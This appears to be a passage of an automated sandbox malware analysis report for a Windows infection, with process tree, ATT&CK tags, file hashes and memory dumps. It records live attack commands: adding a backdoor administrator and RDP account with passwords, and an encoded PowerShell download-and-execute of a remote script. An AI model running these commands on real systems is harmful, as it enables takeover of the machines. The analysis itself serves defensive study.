C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:1596

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
1⤵
PID:1684

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
2⤵
PID:1268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
3⤵
PID:1096

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:1612

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:1744

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wlgHGI30
1⤵
PID:268

C:\Windows\system32\net.exe
net.exe user wgautilacc wlgHGI30
2⤵
PID:872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc wlgHGI30
3⤵
PID:1820

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:944

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:304

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:528

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2008

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:1664

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:636

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.dll
MD5
5c3fdd6eb3167f53dacd21e58e25d6e9

SHA1
e2b1b2126e0deac5d3add3ed0c17a4f35a35a479

SHA256
972fd325be916b158c5611680d2f4fc7641f4251a31cae6d87cd49eca596ac37

SHA512
94902f796a93e3b10001659a74a586ce52b6b749563e5fd9d100837d3c49cd608bc84a27177b3af5fecce253fadb3ae8df3c1ddb5bfb2c5f2d858ebebf8115a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6420.tmp
MD5
456728124e35c03040fa9bf6dc028db8

SHA1
192c11879fe9e814389174d53712ad71f2bb32a4

SHA256
23724a98affdaa4dad082ba411b706fd757db96360a1addb0d5a4fca53749d28

SHA512
73a645477eaeb6d2c3c0802948ee8262c8f9c069184182a3066b0ca55798fc41543e813ee5105a89e305153d8d3e704aa7c19126f0034326f1108dc5b0701117

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip
MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Windows\system32\rfxvmt.dll
MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.0.cs
MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.cmdline
MD5
7a1d2b78fb3a4498747ded0951eecd75

SHA1
c9330558337873d3461b2e7b4042534b2e1e800a

SHA256
d2b84931663e6da0a36a8e70be2d68b255acacab9ca22e87b82449cacd2d17c7

SHA512
f593c7b99593c39742876687fc7879b59537f9cfe1559c3c27aa71ce44e63602ce99863cccf824ee92028e6114b5daef0e64a13ae7e6c5cdba11d75e730e0c34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\CSCECA57343D3A14B89AA49B14023A79037.TMP
MD5
365e313cfc24df35586eddddcfd4abe5

SHA1
f53aecdadb712480ad027609832f8a9af59f76e6

SHA256
7258db462d4cff2b45fcd1533cd406e298bfd3a2345bf285a6171ef8fc17c185

SHA512
3ef3982ff4556d06117a310d69773822348c3c8419cce55df684ab3033bbd4076b828eb15789a938dc2ab36812640313f0753dfe617815d07bdc99285e853692

Download Submit
\Windows\Branding\mediasrv.png
MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
\Windows\Branding\mediasvc.png
MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
memory/304-76-0x0000000000000000-mapping.dmp

Download
memory/332-55-0x0000000000000000-mapping.dmp

Download
memory/344-64-0x0000000000000000-mapping.dmp

Download
memory/388-43-0x0000000000000000-mapping.dmp

Download
memory/472-58-0x0000000000000000-mapping.dmp

Download
memory/556-56-0x0000000000000000-mapping.dmp

Download
memory/580-57-0x0000000000000000-mapping.dmp

Download
memory/636-117-0x0000000000000000-mapping.dmp

Download
memory/656-63-0x0000000000000000-mapping.dmp

Download
memory/816-62-0x0000000000000000-mapping.dmp

Download
memory/820-40-0x0000000000000000-mapping.dmp

Download
memory/872-72-0x0000000000000000-mapping.dmp

Download
memory/928-39-0x0000000000000000-mapping.dmp

Download
memory/948-86-0x0000000000000000-mapping.dmp

Download
memory/1084-13-0x0000000000000000-mapping.dmp

Download
memory/1084-53-0x0000000000000000-mapping.dmp

Download
memory/1092-54-0x0000000000000000-mapping.dmp

Download
memory/1096-78-0x0000000000000000-mapping.dmp

Download
memory/1096-69-0x0000000000000000-mapping.dmp

Download
memory/1100-52-0x0000000000000000-mapping.dmp

Download
memory/1168-36-0x0000000000000000-mapping.dmp

Download
memory/1268-48-0x0000000000000000-mapping.dmp

Download
memory/1268-68-0x0000000000000000-mapping.dmp

Download
memory/1324-61-0x0000000000000000-mapping.dmp

Download
memory/1520-21-0x00000000027E0000-0x00000000027E1000-memory.dmp

Filesize
4KB

Download
memory/1520-35-0x0000000024620000-0x0000000024621000-memory.dmp

Filesize
4KB

Download
memory/1520-6-0x00000000023B0000-0x00000000023B1000-memory.dmp

Filesize
4KB

Download
memory/1520-17-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1520-38-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/1520-18-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/1520-3-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp

Filesize
9.9MB

Download
memory/1520-2-0x0000000000000000-mapping.dmp

Download
memory/1520-5-0x000000001ACF0000-0x000000001ACF1000-memory.dmp

Filesize
4KB

Download
memory/1520-9-0x000000001C140000-0x000000001C141000-memory.dmp

Filesize
4KB

Download
memory/1520-7-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/1520-4-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/1520-34-0x0000000002340000-0x0000000002341000-memory.dmp

Filesize
4KB

Download
memory/1520-33-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1524-80-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp

Filesize
9.9MB

Download
memory/1524-97-0x0000000000F40000-0x0000000000F41000-memory.dmp

Filesize
4KB

Download
memory/1524-87-0x0000000000B00000-0x0000000000B01000-memory.dmp

Filesize
4KB

Download
memory/1524-115-0x000000001ABF0000-0x000000001ABF1000-memory.dmp

Filesize
4KB

Download
memory/1524-114-0x00000000010F0000-0x00000000010F1000-memory.dmp

Filesize
4KB

Download
memory/1524-107-0x000000001AB60000-0x000000001AB61000-memory.dmp

Filesize
4KB

Download
memory/1524-106-0x000000001A060000-0x000000001A061000-memory.dmp

Filesize
4KB

Download
memory/1524-99-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/1524-98-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

Filesize
4KB

Download
memory/1524-79-0x0000000000000000-mapping.dmp

Download
memory/1524-90-0x0000000019EA0000-0x0000000019EA1000-memory.dmp

Filesize
4KB

Download
memory/1524-96-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

Filesize
4KB

Download
memory/1524-95-0x0000000000B20000-0x0000000000B21000-memory.dmp

Filesize
4KB

Download
memory/1584-85-0x0000000000000000-mapping.dmp

Download
memory/1592-45-0x0000000000000000-mapping.dmp

Download
memory/1596-44-0x0000000000000000-mapping.dmp

Download
memory/1596-66-0x0000000000000000-mapping.dmp

Download
memory/1612-49-0x0000000000000000-mapping.dmp

Download
memory/1640-1-0x00000000025A0000-0x00000000025B1000-memory.dmp

Filesize
68KB

Download
memory/1640-0-0x0000000002260000-0x000000000259D000-memory.dmp

Filesize
3.2MB

Download
memory/1648-51-0x0000000000000000-mapping.dmp

Download
memory/1684-46-0x0000000000000000-mapping.dmp

Download
memory/1688-70-0x0000000000000000-mapping.dmp

Download
memory/1688-10-0x0000000000000000-mapping.dmp

Download
memory/1692-65-0x0000000000000000-mapping.dmp

Download
memory/1744-71-0x0000000000000000-mapping.dmp

Download
memory/1752-47-0x0000000000000000-mapping.dmp

Download
memory/1780-42-0x0000000000000000-mapping.dmp

Download
memory/1780-77-0x0000000000000000-mapping.dmp

Download
memory/1820-73-0x0000000000000000-mapping.dmp

Download
memory/1892-41-0x0000000000000000-mapping.dmp

Download
memory/1940-116-0x0000000000000000-mapping.dmp

Download
memory/2008-50-0x0000000000000000-mapping.dmp

Download